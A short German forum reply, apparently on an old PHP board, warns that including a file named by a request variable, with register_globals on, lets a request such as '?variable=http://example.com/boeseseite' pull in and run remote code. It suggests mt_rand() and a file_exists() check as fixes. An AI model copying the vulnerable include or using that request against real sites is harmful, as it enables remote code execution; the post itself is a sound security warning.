Hallo Torsten,

<?php
include($variable . ".html");
?>

wenn hier register_globals auf on steht hat er ein riesiges Sicherheitsloch - was passiert wenn jemand einfach dateiname.php?variable=http://example.com/boeseseite eingibt? richtig, es wird die Seite http://example.com/boeseseite.html aufgerufen - und was da drinsteht wird gnadenlos ausgeführt.

echo $variable . ".html";

ich glaube Ronny wollte eher wissen wie er $variable zufällig generieren kann - das geht mit mt_rand() (->http://www.php3.de/mt_rand) wenn du $variable = mt_rand(1,5) schreibst sollte er dir eine Zahl zwischen 1 und 5 ausspucken. Aber vorsichtshalber vielleicht noch ein if(file_exists($variable.'.html')) include (...); schreiben, damit das include nur ausgeführt wird wenn die Datei wirklich vorhanden ist.

Grüße aus Nürnberg
Tobias